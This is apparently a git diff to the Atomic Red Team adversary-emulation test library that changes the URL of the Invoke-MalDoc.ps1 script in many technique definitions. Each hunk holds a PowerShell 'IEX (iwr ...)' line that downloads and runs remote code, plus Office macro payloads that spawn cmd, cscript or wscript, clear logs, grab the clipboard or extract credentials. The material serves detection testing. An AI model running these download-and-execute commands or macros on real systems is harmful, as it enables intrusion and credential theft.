\"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" name: powershell @@ -58730,7 +58730,7 @@ execution: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore @@ -58792,7 +58792,7 @@ execution: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" name: powershell @@ -58831,7 +58831,7 @@ execution: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" name: powershell @@ -58869,7 +58869,7 @@ execution: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product} name: powershell @@ -59004,7 +59004,7 @@ execution: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" name: powershell - name: Potentially Unwanted Applications (PUA) @@ -60224,7 +60224,7 @@ execution: ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX - (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" name: powershell @@ -61138,7 +61138,7 @@ execution: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec" cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null @@ -61176,7 +61176,7 @@ execution: ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX - (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n" cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" @@ -68378,7 +68378,7 @@ initial-access: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore diff --git a/atomics/T1053.005/T1053.005.md b/atomics/T1053.005/T1053.005.md index 5c41ae1d..a2a34da5 100644 --- a/atomics/T1053.005/T1053.005.md +++ b/atomics/T1053.005/T1053.005.md @@ -202,7 +202,7 @@ This module utilizes the Windows API to schedule a task for code execution (note ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler" ``` diff --git a/atomics/T1055.012/T1055.012.md b/atomics/T1055.012/T1055.012.md index df2fa1a2..2df00d31 100644 --- a/atomics/T1055.012/T1055.012.md +++ b/atomics/T1055.012/T1055.012.md @@ -81,7 +81,7 @@ This module executes notepad.exe from within the WINWORD.EXE process ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit" ``` diff --git a/atomics/T1055/T1055.md b/atomics/T1055/T1055.md index 453192f3..24905c99 100644 --- a/atomics/T1055/T1055.md +++ b/atomics/T1055/T1055.md @@ -37,7 +37,7 @@ is required. ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" ``` diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md index 41960a40..d81a0599 100644 --- a/atomics/T1059.005/T1059.005.md +++ b/atomics/T1059.005/T1059.005.md @@ -93,7 +93,7 @@ You can validate this by opening WinWord -> File -> Account -> About Word ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec" ``` @@ -151,7 +151,7 @@ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.b ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract" ``` diff --git a/atomics/T1070.001/T1070.001.md b/atomics/T1070.001/T1070.001.md index 4f9e6f5f..cc798f16 100644 --- a/atomics/T1070.001/T1070.001.md +++ b/atomics/T1070.001/T1070.001.md @@ -106,7 +106,7 @@ Elevation is required for this module to execute properly, otherwise WINWORD wil ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" ``` diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md index 447bfa64..1d206989 100644 --- a/atomics/T1115/T1115.md +++ b/atomics/T1115/T1115.md @@ -133,7 +133,7 @@ This module copies the data stored in the user's clipboard and writes it to a fi ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA" -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard" ``` diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md index f9bf6006..0d46e7c3 100644 --- a/atomics/T1204.002/T1204.002.md +++ b/atomics/T1204.002/T1204.002.md @@ -55,7 +55,7 @@ References: ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" ``` @@ -152,7 +152,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" ``` @@ -207,7 +207,7 @@ Execution is handled by [Invoke-MalDoc](https://github.com/redcanaryco/invoke-at ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" ``` @@ -261,7 +261,7 @@ Microsoft Office creating then launching a .bat script from an AppData directory ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product} ``` @@ -423,7 +423,7 @@ and pull down the script and execute it. By default the payload will execute cal ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" ``` diff --git a/atomics/T1555/T1555.md b/atomics/T1555/T1555.md index 24135db4..67f4c9ca 100644 --- a/atomics/T1555/T1555.md +++ b/atomics/T1555/T1555.md @@ -32,7 +32,7 @@ them to $env:TEMP\windows-credentials.txt ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract" ``` diff --git a/atomics/T1564/T1564.md b/atomics/T1564/T1564.md index 08e4f131..87730cb9 100644 --- a/atomics/T1564/T1564.md +++ b/atomics/T1564/T1564.md @@ -45,7 +45,7 @@ oleObject.bin file is a payload that is parsed out and executed on the file syst $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap ``` diff --git a/atomics/T1566.001/T1566.001.md b/atomics/T1566.001/T1566.001.md index da4434af..4affc48e 100644 --- a/atomics/T1566.001/T1566.001.md +++ b/atomics/T1566.001/T1566.001.md @@ -79,7 +79,7 @@ Upon execution, CMD will be lauchned and ping 8.8.8.8 ```powershell [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 -IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) +IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" ```